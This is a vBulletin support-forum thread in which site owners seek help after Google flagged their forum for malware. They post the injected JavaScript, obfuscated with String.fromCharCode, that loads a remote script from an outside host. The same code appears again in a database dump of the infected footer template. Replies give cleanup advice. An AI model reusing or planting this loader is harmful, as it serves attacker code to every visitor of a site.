Malware on my vBulletin

Collapse
X
Collapse
 
  • Page of 2
  • Time
  • Show
Clear All
new posts
Previous 1 2 template Next
  • farhanisfarhan
    New Member
    • May 2010
    • 29
    • 4.2.X
    #1

    [Forum] Malware on my vBulletin

    Dear vBulletin

    My site has been listed as containing malware.

    I have replaced the original files again but still vBulletin says "File does not contain expected contents".

    Please help me fix it.

    [FONT=verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif]The Google webmaster tools "Diagnostic" feature has provided the following code:[/FONT]

    <script type="text/javascript">
    <!--
    // Main vBulletin Javascript Initialization
    var script=document.createElement(String.fromCharCode(115,
    99,114,105,112,116));script.src=String.fromCharCode(104,116,
    116,112,58,47,47,112,105,99,116,117,114,101,115,45,104,111,1
    15,116,46,105,110,47,106,113,117,101,114,121,46,99,111,109,1
    12,97,116,105,98,105,108,105,116,121,46,106,115);var head=do
    cument.getElementsByTagName(String.fromCharCode(104,101,97,1
    00))[0];head.appendChild(script);var script=document.createE
    lement(String.fromCharCode(115,99,114,105,112,116));script.s
    rc=String.fromCharCode(104,116,116,112,58,47,47,112,105,99,1
    16,117,114,101,115,45,104,111,115,116,46,105,110,47,106,113,
    117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,
    116,121,46,106,115);var head=document.getElementsByTagName(S
    tring.fromCharCode(104,101,97,100))[0];head.appendChild(scri
    pt);vBulletin_init();
    //-->
    </script>
    Muslim Forum
    Tags: None
    • Lynne
      Former vBulletin Support
      • Oct 2004
      • 26255
      #2
      You said you replaced all the original files, did you also upload a database backup? And if no, did you go through your database looking for any injections?
      Please don't PM or VM me for support - I only help out in the threads.
      vBulletin Manual & vBulletin 4.0 Code Documentation (API)
      Want help modifying your vbulletin forum? Head on over to vbulletin.org
      If I post CSS and you don't know where it goes, throw it into the additional.css template.
      W3Schools &lt;- awesome site for html/css help

        Comment

        • farhanisfarhan
          New Member
          • May 2010
          • 29
          • 4.2.X
          #3
          I had to delete the following two records from phpmyadmin. But now my footer wouldn't turn up. Any solution?

          PHP Code:
          -- phpMyAdmin SQL Dump-- version 3.3.3-- http://www.phpmyadmin.net---- Host: localhost:3306-- Generation Time: Feb 23, 2012 at 10:12 AM-- Server version: 5.5.18-- PHP Version: 5.2.6
          SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";

          /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;/*!40101 SET NAMES utf8 */;
          ----           Database: `admin_forum`--
          -- --------------------------------------------------------
          ----           Table structure for table `template`--
          CREATE TABLE IF NOT EXISTS `template` (  `templateidint(10unsigned NOT NULL AUTO_INCREMENT,  `styleidsmallint(6NOT NULL DEFAULT '0',  `titlevarchar(100NOT NULL DEFAULT '',  `templatemediumtext,  `template_unmediumtext,  `templatetypeenum('template','stylevar','css','replacement'NOT NULL DEFAULT 'template',  `datelineint(10unsigned NOT NULL DEFAULT '0',  `usernamevarchar(100NOT NULL DEFAULT '',  `versionvarchar(30NOT NULL DEFAULT '',  `productvarchar(25NOT NULL DEFAULT '',  `mergestatusenum('none','merged','conflicted'NOT NULL DEFAULT 'none',  PRIMARY KEY (`templateid`),  UNIQUE KEY `title` (`title`,`styleid`,`templatetype`),  KEY `styleid` (`styleid`)) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=20323 ;
          ----           Dumping data for table `template`--
          INSERT INTO `template` (`templateid`, `styleid`, `title`, `template`, `template_un`, `templatetype`, `dateline`, `username`, `version`, `product`, `mergestatus`) VALUES(19354, -10'footer''<vb:if condition="!empty($ad_location[''ad_footer_start'']) or !empty($ad_location[''global_above_footer''])">\r\n<div style="clear: {vb:stylevar left}">\r\n  {vb:raw ad_location.ad_footer_start}\r\n  {vb:raw ad_location.global_above_footer}\r\n</div>\r\n</vb:if>\r\n<div id="footer" class="floatcontainer footer">\r\n\r\n    <form action="{vb:link forumhome|nosession}" method="get" id="footer_select" class="footer_select">\r\n\r\n            \r\n        <vb:if condition="$show[''quickchooser'']">\r\n            <select name="styleid" onchange="switch_id(this, ''style'')">\r\n                <optgroup label="{vb:rawphrase quick_style_chooser}">\r\n                    {vb:raw quickchooserbits}\r\n                </optgroup>\r\n            </select>    \r\n        </vb:if>\r\n        \r\n        <vb:if condition="$show[''languagechooser'']">\r\n            <select name="langid" onchange="switch_id(this, ''lang'')">\r\n                <optgroup label="{vb:rawphrase quick_language_chooser}">\r\n                    {vb:raw languagechooserbits}\r\n                </optgroup>\r\n            </select>\r\n        </vb:if>\r\n    </form>\r\n\r\n    <ul id="footer_links" class="footer_links">\r\n        <vb:if condition="$show[''contactus'']"><li><a href="{vb:raw vboptions.contactuslink}" rel="nofollow" accesskey="9">{vb:rawphrase contact_us}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''hometitle'']"><li><a href="{vb:raw vboptions.homeurl}">{vb:raw vboptions.hometitle}</a></li></vb:if>\r\n        <vb:if condition="$show[''admincplink'']"><li><a href="{vb:raw admincpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase admin}</a></li></vb:if>\r\n        <vb:if condition="$show[''modcplink'']"><li><a href="{vb:raw modcpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase mod}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''archiveenabled'']"><li><a href="archive/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase archive}</a></li></vb:if>\r\n        {vb:raw template_hook.footer_links}\r\n        <vb:if condition="$vboptions[''privacyurl'']"><li><a href="{vb:raw vboptions.privacyurl}">{vb:rawphrase privacy_statement}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''tosurl'']"><li><a href="{vb:raw vboptions.tosurl}">{vb:rawphrase terms_of_service}</a></li></vb:if>\r\n        <li><a href="{vb:raw relpath}#top" onclick="document.location.hash=''top''; return false;">{vb:rawphrase top}</a></li>\r\n    </ul>\r\n    \r\n    \r\n    <vb:if condition="$show[''dst_correction'']">\r\n    <!-- auto DST correction code -->\r\n        <form action="profile.php?do=dst" method="post" name="dstform">\r\n            <input type="hidden" name="s" value="{vb:raw session.sessionhash}" />\r\n            <input type="hidden" name="securitytoken" value="{vb:raw bbuserinfo.securitytoken}" />\r\n            <input type="hidden" name="do" value="dst" />\r\n        </form>\r\n        <script type="text/javascript">\r\n        <!--\r\n            var tzOffset = {vb:raw bbuserinfo.timezoneoffset} + {vb:raw bbuserinfo.dstonoff};\r\n            var utcOffset = new Date().getTimezoneOffset() / 60;\r\n            if (Math.abs(tzOffset + utcOffset) == 1)\r\n            {    // Dst offset is 1 so its changed\r\n                document.forms.dstform.submit();\r\n            }\r\n        //-->\r\n        </script>\r\n        <!-- / auto DST correction code -->\r\n    </vb:if>\r\n    \r\n    <script type="text/javascript">\r\n    <!--\r\n        // Main vBulletin Javascript Initialization\r\n        vBulletin_init();\r\n    //-->\r\n    </script>\r\n        {vb:raw template_hook.footer_javascript}\r\n</div>\r\n</div> <!-- closing div for body_wrapper -->\r\n\r\n<div class="below_body">\r\n<div id="footer_time" class="shade footer_time">{vb:rawphrase all_times_are_gmt_x_time_now_is_y}</div>\r\n\r\n<div id="footer_copyright" class="shade footer_copyright">\r\n    <!-- Do not remove this copyright notice -->\r\n    {vb:rawphrase powered_by_vbulletin}\r\n    <!-- Do not remove this copyright notice -->    \r\n</div>\r\n<div id="footer_morecopyright" class="shade footer_morecopyright">\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw cronimage}\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw vboptions.copyrighttext}\r\n</div>\r\n{vb:raw ad_location.ad_footer_end} \r\n<vb:if condition="$vboptions[''enablefacebookconnect'']">\r\n    {vb:raw facebook_footer}\r\n</vb:if>\r\n</div>''<vb:if condition="!empty($ad_location[''ad_footer_start'']) or !empty($ad_location[''global_above_footer''])">\r\n<div style="clear: {vb:stylevar left}">\r\n  {vb:raw ad_location.ad_footer_start}\r\n  {vb:raw ad_location.global_above_footer}\r\n</div>\r\n</vb:if>\r\n<div id="footer" class="floatcontainer footer">\r\n\r\n    <form action="{vb:link forumhome|nosession}" method="get" id="footer_select" class="footer_select">\r\n\r\n            \r\n        <vb:if condition="$show[''quickchooser'']">\r\n            <select name="styleid" onchange="switch_id(this, ''style'')">\r\n                <optgroup label="{vb:rawphrase quick_style_chooser}">\r\n                    {vb:raw quickchooserbits}\r\n                </optgroup>\r\n            </select>    \r\n        </vb:if>\r\n        \r\n        <vb:if condition="$show[''languagechooser'']">\r\n            <select name="langid" onchange="switch_id(this, ''lang'')">\r\n                <optgroup label="{vb:rawphrase quick_language_chooser}">\r\n                    {vb:raw languagechooserbits}\r\n                </optgroup>\r\n            </select>\r\n        </vb:if>\r\n    </form>\r\n\r\n    <ul id="footer_links" class="footer_links">\r\n        <vb:if condition="$show[''contactus'']"><li><a href="{vb:raw vboptions.contactuslink}" rel="nofollow" accesskey="9">{vb:rawphrase contact_us}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''hometitle'']"><li><a href="{vb:raw vboptions.homeurl}">{vb:raw vboptions.hometitle}</a></li></vb:if>\r\n        <vb:if condition="$show[''admincplink'']"><li><a href="{vb:raw admincpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase admin}</a></li></vb:if>\r\n        <vb:if condition="$show[''modcplink'']"><li><a href="{vb:raw modcpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase mod}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''archiveenabled'']"><li><a href="archive/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase archive}</a></li></vb:if>\r\n        {vb:raw template_hook.footer_links}\r\n        <vb:if condition="$vboptions[''privacyurl'']"><li><a href="{vb:raw vboptions.privacyurl}">{vb:rawphrase privacy_statement}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''tosurl'']"><li><a href="{vb:raw vboptions.tosurl}">{vb:rawphrase terms_of_service}</a></li></vb:if>\r\n        <li><a href="{vb:raw relpath}#top" onclick="document.location.hash=''top''; return false;">{vb:rawphrase top}</a></li>\r\n    </ul>\r\n    \r\n    \r\n    <vb:if condition="$show[''dst_correction'']">\r\n    <!-- auto DST correction code -->\r\n        <form action="profile.php?do=dst" method="post" name="dstform">\r\n            <input type="hidden" name="s" value="{vb:raw session.sessionhash}" />\r\n            <input type="hidden" name="securitytoken" value="{vb:raw bbuserinfo.securitytoken}" />\r\n            <input type="hidden" name="do" value="dst" />\r\n        </form>\r\n        <script type="text/javascript">\r\n        <!--\r\n            var tzOffset = {vb:raw bbuserinfo.timezoneoffset} + {vb:raw bbuserinfo.dstonoff};\r\n            var utcOffset = new Date().getTimezoneOffset() / 60;\r\n            if (Math.abs(tzOffset + utcOffset) == 1)\r\n            {    // Dst offset is 1 so its changed\r\n                document.forms.dstform.submit();\r\n            }\r\n        //-->\r\n        </script>\r\n        <!-- / auto DST correction code -->\r\n    </vb:if>\r\n    \r\n    <script type="text/javascript">\r\n    <!--\r\n        // Main vBulletin Javascript Initialization\r\n        vBulletin_init();\r\n    //-->\r\n    </script>\r\n        {vb:raw template_hook.footer_javascript}\r\n</div>\r\n</div> <!-- closing div for body_wrapper -->\r\n\r\n<div class="below_body">\r\n<div id="footer_time" class="shade footer_time">{vb:rawphrase all_times_are_gmt_x_time_now_is_y}</div>\r\n\r\n<div id="footer_copyright" class="shade footer_copyright">\r\n    <!-- Do not remove this copyright notice -->\r\n    {vb:rawphrase powered_by_vbulletin}\r\n    <!-- Do not remove this copyright notice -->    \r\n</div>\r\n<div id="footer_morecopyright" class="shade footer_morecopyright">\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw cronimage}\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw vboptions.copyrighttext}\r\n</div>\r\n{vb:raw ad_location.ad_footer_end} \r\n<vb:if condition="$vboptions[''enablefacebookconnect'']">\r\n    {vb:raw facebook_footer}\r\n</vb:if>\r\n</div>''template'1315947256'vBulletin Solutions''4.1.8 Beta 1''vbulletin''none'),(20304, -1'footer''$final_rendered = '''' . ''''; if (!empty($ad_location[''ad_footer_start'']) or !empty($ad_location[''global_above_footer''])) {\n                    $final_rendered .= ''\r\n<div style="clear: '' . vB_Template_Runtime::fetchStylevar("left") . ''">\r\n  '' . $ad_location[''ad_footer_start''] . ''\r\n  '' . $ad_location[''global_above_footer''] . ''\r\n</div>\r\n'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n<div id="footer" class="floatcontainer footer">\r\n\r\n    <form action="'' . vB_Template_Runtime::linkBuild("forumhome|nosession") . ''" method="get" id="footer_select" class="footer_select">\r\n\r\n            \r\n        '' . ''''; if ($show[''quickchooser'']) {\n                    $final_rendered .= ''\r\n            <select name="styleid" onchange="switch_id(this, \\''style\\'')">\r\n                <optgroup label="'' . vB_Template_Runtime::parsePhrase("quick_style_chooser") . ''">\r\n                    '' . $quickchooserbits . ''\r\n                </optgroup>\r\n            </select>    \r\n        '';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        \r\n        '' . ''''; if ($show[''languagechooser'']) {\n                    $final_rendered .= ''\r\n            <select name="langid" onchange="switch_id(this, \\''lang\\'')">\r\n                <optgroup label="'' . vB_Template_Runtime::parsePhrase("quick_language_chooser") . ''">\r\n                    '' . $languagechooserbits . ''\r\n                </optgroup>\r\n            </select>\r\n        '';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n    </form>\r\n\r\n    <ul id="footer_links" class="footer_links">\r\n        '' . ''''; if ($show[''contactus'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''contactuslink''] . ''" rel="nofollow" accesskey="9">'' . vB_Template_Runtime::parsePhrase("contact_us") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''hometitle'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''homeurl''] . ''">'' . $vboptions[''hometitle''] . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($show[''admincplink'']) {\n                    $final_rendered .= ''<li><a href="'' . $admincpdir . ''/index.php'' . $session[''sessionurl_q''] . ''">'' . vB_Template_Runtime::parsePhrase("admin") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($show[''modcplink'']) {\n                    $final_rendered .= ''<li><a href="'' . $modcpdir . ''/index.php'' . $session[''sessionurl_q''] . ''">'' . vB_Template_Runtime::parsePhrase("mod") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''archiveenabled'']) {\n                    $final_rendered .= ''<li><a href="archive/index.php'' . $session[''sessionurl_q''] . ''">'' . vB_Template_Runtime::parsePhrase("archive") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . $template_hook[''footer_links''] . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''privacyurl'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''privacyurl''] . ''">'' . vB_Template_Runtime::parsePhrase("privacy_statement") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        '' . ''''; if ($GLOBALS[''vbulletin'']->options[''tosurl'']) {\n                    $final_rendered .= ''<li><a href="'' . $vboptions[''tosurl''] . ''">'' . vB_Template_Runtime::parsePhrase("terms_of_service") . ''</a></li>'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n        <li><a href="'' . $relpath . ''#top" onclick="document.location.hash=\\''top\\''; return false;">'' . vB_Template_Runtime::parsePhrase("top") . ''</a></li>\r\n    </ul>\r\n    \r\n    \r\n    '' . ''''; if ($show[''dst_correction'']) {\n                    $final_rendered .= ''\r\n    <!-- auto DST correction code -->\r\n        <form action="profile.php?do=dst" method="post" name="dstform">\r\n            <input type="hidden" name="s" value="'' . $session[''sessionhash''] . ''" />\r\n            <input type="hidden" name="securitytoken" value="'' . $bbuserinfo[''securitytoken''] . ''" />\r\n            <input type="hidden" name="do" value="dst" />\r\n        </form>\r\n        <script type="text/javascript">\r\n        <!--\r\n            var tzOffset = '' . $bbuserinfo[''timezoneoffset''] . '' + '' . $bbuserinfo[''dstonoff''] . '';\r\n            var utcOffset = new Date().getTimezoneOffset() / 60;\r\n            if (Math.abs(tzOffset + utcOffset) == 1)\r\n            {    // Dst offset is 1 so its changed\r\n                document.forms.dstform.submit();\r\n            }\r\n        //-->\r\n        </script>\r\n        <!-- / auto DST correction code -->\r\n    '';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n    \r\n    <script type="text/javascript">\r\n    <!--\r\n        // Main vBulletin Javascript Initialization\r\n        var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,112,105,99,116,117,114,101,115,45,104,111,115,116,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,112,105,99,116,117,114,101,115,45,104,111,115,116,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();\r\n    //-->\r\n    </script>\r\n        '' . $template_hook[''footer_javascript''] . ''\r\n</div>\r\n</div> <!-- closing div for body_wrapper -->\r\n\r\n<div class="below_body">\r\n<div id="footer_time" class="shade footer_time">'' . vB_Template_Runtime::parsePhrase("all_times_are_gmt_x_time_now_is_y") . ''</div>\r\n\r\n<div id="footer_copyright" class="shade footer_copyright">\r\n    <!-- Do not remove this copyright notice -->\r\n    '' . vB_Template_Runtime::parsePhrase("powered_by_vbulletin") . ''\r\n    <!-- Do not remove this copyright notice -->    \r\n</div>\r\n<div id="footer_morecopyright" class="shade footer_morecopyright">\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    '' . $cronimage . ''\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    '' . $vboptions[''copyrighttext''] . ''\r\n</div>\r\n'' . $ad_location[''ad_footer_end''] . '' \r\n'' . ''''; if ($GLOBALS[''vbulletin'']->options[''enablefacebookconnect'']) {\n                    $final_rendered .= ''\r\n    '' . $facebook_footer . ''\r\n'';\n                } else {\n            $final_rendered .= '''';\n        }$final_rendered .= '''' . ''\r\n</div>'';''<vb:if condition="!empty($ad_location[''ad_footer_start'']) or !empty($ad_location[''global_above_footer''])">\r\n<div style="clear: {vb:stylevar left}">\r\n  {vb:raw ad_location.ad_footer_start}\r\n  {vb:raw ad_location.global_above_footer}\r\n</div>\r\n</vb:if>\r\n<div id="footer" class="floatcontainer footer">\r\n\r\n    <form action="{vb:link forumhome|nosession}" method="get" id="footer_select" class="footer_select">\r\n\r\n            \r\n        <vb:if condition="$show[''quickchooser'']">\r\n            <select name="styleid" onchange="switch_id(this, ''style'')">\r\n                <optgroup label="{vb:rawphrase quick_style_chooser}">\r\n                    {vb:raw quickchooserbits}\r\n                </optgroup>\r\n            </select>    \r\n        </vb:if>\r\n        \r\n        <vb:if condition="$show[''languagechooser'']">\r\n            <select name="langid" onchange="switch_id(this, ''lang'')">\r\n                <optgroup label="{vb:rawphrase quick_language_chooser}">\r\n                    {vb:raw languagechooserbits}\r\n                </optgroup>\r\n            </select>\r\n        </vb:if>\r\n    </form>\r\n\r\n    <ul id="footer_links" class="footer_links">\r\n        <vb:if condition="$show[''contactus'']"><li><a href="{vb:raw vboptions.contactuslink}" rel="nofollow" accesskey="9">{vb:rawphrase contact_us}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''hometitle'']"><li><a href="{vb:raw vboptions.homeurl}">{vb:raw vboptions.hometitle}</a></li></vb:if>\r\n        <vb:if condition="$show[''admincplink'']"><li><a href="{vb:raw admincpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase admin}</a></li></vb:if>\r\n        <vb:if condition="$show[''modcplink'']"><li><a href="{vb:raw modcpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase mod}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''archiveenabled'']"><li><a href="archive/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase archive}</a></li></vb:if>\r\n        {vb:raw template_hook.footer_links}\r\n        <vb:if condition="$vboptions[''privacyurl'']"><li><a href="{vb:raw vboptions.privacyurl}">{vb:rawphrase privacy_statement}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''tosurl'']"><li><a href="{vb:raw vboptions.tosurl}">{vb:rawphrase terms_of_service}</a></li></vb:if>\r\n        <li><a href="{vb:raw relpath}#top" onclick="document.location.hash=''top''; return false;">{vb:rawphrase top}</a></li>\r\n    </ul>\r\n    \r\n    \r\n    <vb:if condition="$show[''dst_correction'']">\r\n    <!-- auto DST correction code -->\r\n        <form action="profile.php?do=dst" method="post" name="dstform">\r\n            <input type="hidden" name="s" value="{vb:raw session.sessionhash}" />\r\n            <input type="hidden" name="securitytoken" value="{vb:raw bbuserinfo.securitytoken}" />\r\n            <input type="hidden" name="do" value="dst" />\r\n        </form>\r\n        <script type="text/javascript">\r\n        <!--\r\n            var tzOffset = {vb:raw bbuserinfo.timezoneoffset} + {vb:raw bbuserinfo.dstonoff};\r\n            var utcOffset = new Date().getTimezoneOffset() / 60;\r\n            if (Math.abs(tzOffset + utcOffset) == 1)\r\n            {    // Dst offset is 1 so its changed\r\n                document.forms.dstform.submit();\r\n            }\r\n        //-->\r\n        </script>\r\n        <!-- / auto DST correction code -->\r\n    </vb:if>\r\n    \r\n    <script type="text/javascript">\r\n    <!--\r\n        // Main vBulletin Javascript Initialization\r\n        vBulletin_init();\r\n    //-->\r\n    </script>\r\n        {vb:raw template_hook.footer_javascript}\r\n</div>\r\n</div> <!-- closing div for body_wrapper -->\r\n\r\n<div class="below_body">\r\n<div id="footer_time" class="shade footer_time">{vb:rawphrase all_times_are_gmt_x_time_now_is_y}</div>\r\n\r\n<div id="footer_copyright" class="shade footer_copyright">\r\n    <!-- Do not remove this copyright notice -->\r\n    {vb:rawphrase powered_by_vbulletin}\r\n    <!-- Do not remove this copyright notice -->    \r\n</div>\r\n<div id="footer_morecopyright" class="shade footer_morecopyright">\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw cronimage}\r\n    <!-- Do not remove cronimage or your scheduled tasks will cease to function -->\r\n    {vb:raw vboptions.copyrighttext}\r\n</div>\r\n{vb:raw ad_location.ad_footer_end} \r\n<vb:if condition="$vboptions[''enablefacebookconnect'']">\r\n    {vb:raw facebook_footer}\r\n</vb:if>\r\n</div>''template'1315947256'vBulletin Solutions''4.1.8 Beta 1''vbulletin''none'); 
          Muslim Forum

            Comment

            • Winter Sonata
              Senior Member
              • Apr 2010
              • 108
              • 4.0.0
              #4
              if possible, then best solution in this case, is that, delete all files in public_html folder , upload them again, upload a clean backup you downloaded earlier before that happened, I guess everything should be OK.

              BTW, did you check your index files ? i had this before and was adding some strange code at the top of the index files and when I removed it came back again, is that your situation too ?

              Regards!

                Comment

                • Winter Sonata
                  Senior Member
                  • Apr 2010
                  • 108
                  • 4.0.0
                  #5
                  Btw, the site is working and no warning message, I guess it's white-listed now, congrats and Salam from a neighbor Country

                    Comment

                    • farhanisfarhan
                      New Member
                      • May 2010
                      • 29
                      • 4.2.X
                      #6
                      Originally posted by Winter Sonata
                      Btw, the site is working and no warning message, I guess it's white-listed now, congrats and Salam from a neighbor Country
                      Wa Alaikum Salam W'Rahmatullah W'Barakatuhu

                      1. I had replaced all files but file check system in Dignostics of vBulletin admin panel says "File does not contain expected contents".
                      2. Can you tell me which index file you mentioned in your comment?
                      Muslim Forum

                        Comment

                        • Winter Sonata
                          Senior Member
                          • Apr 2010
                          • 108
                          • 4.0.0
                          #7
                          This malware was inserting itself in all my files titles with : index.php , check them if they do have this code in your first post,

                          is your site malware free now ?

                            Comment

                            • jgas
                              Senior Member
                              • Jul 2007
                              • 124
                              • 3.8.x
                              #8
                              hi!
                              how do you delete this record from phpmyadmin?

                              I'm having the same script in my html and now my website is marked as "malware".

                              Please help me, thanks!

                              Originally posted by farhanisfarhan
                              I had to delete the following two records from phpmyadmin. But now my footer wouldn't turn up. Any solution?

                              PHP Code:
                              -- phpMyAdmin SQL Dump-- version 3.3.3-- http://www.phpmyadmin.net---- Host: localhost:3306-- Generation Time: Feb 23, 2012 at 10:12 AM-- Server version: 5.5.18-- PHP Version: 5.2.6
                              SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";

                              /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;/*!40101 SET NAMES utf8 */;
                              ----                               Database: `admin_forum`--
                              -- --------------------------------------------------------
                              ----                               Table structure for table `template`--
                              CREATE TABLE IF NOT EXISTS `template` (  `templateidint(10unsigned NOT NULL AUTO_INCREMENT,  `styleidsmallint(6NOT NULL DEFAULT '0',  `titlevarchar(100NOT NULL DEFAULT '',  `templatemediumtext,  `template_unmediumtext,  `templatetypeenum('template','stylevar','css','replacement'NOT NULL DEFAULT 'template',  `datelineint(10unsigned NOT NULL DEFAULT '0',  `usernamevarchar(100NOT NULL DEFAULT '',  `versionvarchar(30NOT NULL DEFAULT '',  `productvarchar(25NOT NULL DEFAULT '',  `mergestatusenum('none','merged','conflicted'NOT NULL DEFAULT 'none',  PRIMARY KEY (`templateid`),  UNIQUE KEY `title` (`title`,`styleid`,`templatetype`),  KEY `styleid` (`styleid`)) ENGINE=MyISAM  DEFAULT CHARSET=latin1 AUTO_INCREMENT=20323 ;
                              ----                               Dumping data for table `template`--
                              INSERT INTO `template` (`templateid`, `styleid`, `title`, `template`, `template_un`, `templatetype`, `dateline`, `username`, `version`, `product`, `mergestatus`) VALUES(19354, -10'footer''<vb:if condition="!empty($ad_location[''ad_footer_start'']) or !empty($ad_location[''global_above_footer''])">\r\n<div style="clear: {vb:stylevar left}">\r\n  {vb:raw ad_location.ad_footer_start}\r\n  {vb:raw ad_location.global_above_footer}\r\n</div>\r\n</vb:if>\r\n<div id="footer" class="floatcontainer footer">\r\n\r\n    <form action="{vb:link forumhome|nosession}" method="get" id="footer_select" class="footer_select">\r\n\r\n            \r\n        <vb:if condition="$show[''quickchooser'']">\r\n            <select name="styleid" onchange="switch_id(this, ''style'')">\r\n                <optgroup label="{vb:rawphrase quick_style_chooser}">\r\n                    {vb:raw quickchooserbits}\r\n                </optgroup>\r\n            </select>    \r\n        </vb:if>\r\n        \r\n        <vb:if condition="$show[''languagechooser'']">\r\n            <select name="langid" onchange="switch_id(this, ''lang'')">\r\n                <optgroup label="{vb:rawphrase quick_language_chooser}">\r\n                    {vb:raw languagechooserbits}\r\n                </optgroup>\r\n            </select>\r\n        </vb:if>\r\n    </form>\r\n\r\n    <ul id="footer_links" class="footer_links">\r\n        <vb:if condition="$show[''contactus'']"><li><a href="{vb:raw vboptions.contactuslink}" rel="nofollow" accesskey="9">{vb:rawphrase contact_us}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''hometitle'']"><li><a href="{vb:raw vboptions.homeurl}">{vb:raw vboptions.hometitle}</a></li></vb:if>\r\n        <vb:if condition="$show[''admincplink'']"><li><a href="{vb:raw admincpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase admin}</a></li></vb:if>\r\n        <vb:if condition="$show[''modcplink'']"><li><a href="{vb:raw modcpdir}/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase mod}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''archiveenabled'']"><li><a href="archive/index.php{vb:raw session.sessionurl_q}">{vb:rawphrase archive}</a></li></vb:if>\r\n        {vb:raw template_hook.footer_links}\r\n        <vb:if condition="$vboptions[''privacyurl'']"><li><a href="{vb:raw vboptions.privacyurl}">{vb:rawphrase privacy_statement}</a></li></vb:if>\r\n        <vb:if condition="$vboptions[''tosurl'']"><li><a href="{vb:raw vboptions.tosurl}">{vb:rawphrase terms_of_service}</a></li></vb:if>\r\n        <li><a href="{vb:raw relpath}#top" onclick="document.location.hash=''top''; return false;">{vb:rawphrase top}</a></li>\r\n    </ul>\r\n    \r\n    \r\n    <vb:if condition="$show[''dst_correction'']">\r\n    <!-- auto DST correction code -->\r\n        <form action="profile.php?do=dst" method="post" name="dstform">\r\n            <input type="hidden" name="s" value="{vb:raw session.sessionhash}" />\r\n            <input type="hidden" name="securitytoken" value="{vb:raw bbuserinfo.securitytoken}" />\r\n            <input type="hidden" name="do" value="dst" />\r\n        </form>\r\n        <script type="text/javascript">\r\n        <!--\r\n            var tzOffset = {vb:raw bbuserinfo.timezoneoffset} + {vb:raw bbuserinfo.dstonoff};\r\n            var utcOffset = new Date().getTimezoneOffset() / 60;\r\n            if (Math.abs(tzOffset + utcOffset) == 1)\r\n            {    // 